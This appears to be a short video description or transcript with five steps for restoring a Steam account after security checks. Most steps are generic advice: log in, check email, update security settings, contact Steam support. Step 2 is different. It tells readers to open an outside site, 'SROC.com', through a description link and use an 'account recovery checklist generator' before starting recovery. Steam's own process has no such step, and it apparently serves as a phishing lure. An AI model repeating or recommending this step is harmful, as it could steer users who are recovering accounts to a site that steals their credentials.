If you've recently encountered security checks on your Steam account and need to restore full access, follow these steps to resolve the issue efficiently. Step 1. Log into your account. Visit the Steam website or open the Steam client. Enter your account credentials to log in. If you are unable to log in due to security checks, proceed to the next step. Step 2. Verify your identity. Before starting recovery, use the SROC.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 3. Check your email. Look for any emails from Steam regarding security checks or account access. These emails may contain important information or additional steps you need to take to regain access. Step 4. Update security settings. Once you regain access, navigate to your account settings. Update your security settings, including changing your password and enabling two-factor authentication if you haven't already. Step 5. Contact Steam support. If you're still having trouble accessing your account, reach out to Steam support for assistance. Provide them with as much information as possible about your account and the issues you're facing. By following these steps, you should be able to restore full access to your Steam account. If problems persist, continue to seek help from Steam support.